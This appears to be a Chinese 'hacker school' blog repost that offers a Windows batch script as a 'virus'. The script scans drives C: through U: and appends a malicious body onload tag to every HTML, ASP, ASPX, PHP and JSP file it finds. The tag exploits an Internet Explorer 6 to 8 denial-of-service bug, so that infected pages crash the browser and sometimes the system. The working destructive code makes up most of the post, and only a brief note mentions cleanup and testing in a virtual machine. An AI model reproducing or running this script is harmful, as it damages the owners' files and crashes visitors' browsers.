黑客学堂

版权声明：转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://xiyingbiao.blogbus.com/logs/40653010.html

   网页文件全盘感染病毒 利用Microsoft IE浏览器 screen[""]远程拒绝服务漏洞受影响系统：Microsoft Internet Explorer 8 beta 2Microsoft Internet Explorer 8 beta 1Microsoft Internet Explorer 7.0Microsof ...

网页文件全盘感染病毒 利用Microsoft IE浏览器 screen[""]远程拒绝服务漏洞
受影响系统：
Microsoft Internet Explorer 8 beta 2
Microsoft Internet Explorer 8 beta 1
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0
运行后，会感染全盘的 网页文件！感染格式包括: html   htm   asp aspx php   jsp . 感染后的网页文件只要用IE打开，IE就会崩溃掉，极个别机子甚至会出现蓝屏现象。

for %%a in (C:\ D:\ E:\ F:\ G:\ I:\ J:\ K:\ L:\ M:\ N:\ O:\ P:\ Q:\ R:\ S:\ T:\ U:\) do (for /f "tokens=*" %%b in ('dir /S /A /B %%a*.html') do echo ^<^body onload=screen[""]^>>>"%%b")
for %%a in (C:\ D:\ E:\ F:\ G:\ I:\ J:\ K:\ L:\ M:\ N:\ O:\ P:\ Q:\ R:\ S:\ T:\ U:\) do (for /f "tokens=*" %%b in ('dir /S /A /B %%a*.htm') do echo ^<^body onload=screen[""]^>>>"%%b")
for %%a in (C:\ D:\ E:\ F:\ G:\ I:\ J:\ K:\ L:\ M:\ N:\ O:\ P:\ Q:\ R:\ S:\ T:\ U:\) do (for /f "tokens=*" %%b in ('dir /S /A /B %%a*.asp') do echo ^<^body onload=screen[""]^>>>"%%b")第三区安全小组博客！
for %%a in (C:\ D:\ E:\ F:\ G:\ I:\ J:\ K:\ L:\ M:\ N:\ O:\ P:\ Q:\ ) do (for /f "tokens=*" %%b in ('dir /S /A /B %%a*.aspx') do echo ^<^body onload=screen[""]^>>>"%%b")
for %%a in (C:\ D:\ E:\ F:\ G:\ I:\ J:\ K:\ L:\ M:\ N:\ O:\ P:\ Q:\ ) do (for /f "tokens=*" %%b in ('dir /S /A /B %%a*.php') do echo ^<^body onload=screen[""]^>>>"%%b")
for %%a in (C:\ D:\ E:\ F:\ G:\ I:\ J:\ K:\ L:\ M:\ N:\ O:\ P:\ Q:\ ) do (for /f "tokens=*" %%b in ('dir /S /A /B %%a*.jsp') do echo ^<^body onload=screen[""]^>>>"%%b")

注：

    此感染可以用批量挂马清除工具清理。此代码为追加为防止意外可用虚拟机活指定盘符，或将代码部分的*.html，asp，jsp ，aspx改成其他格式做测试。如1.xmvb。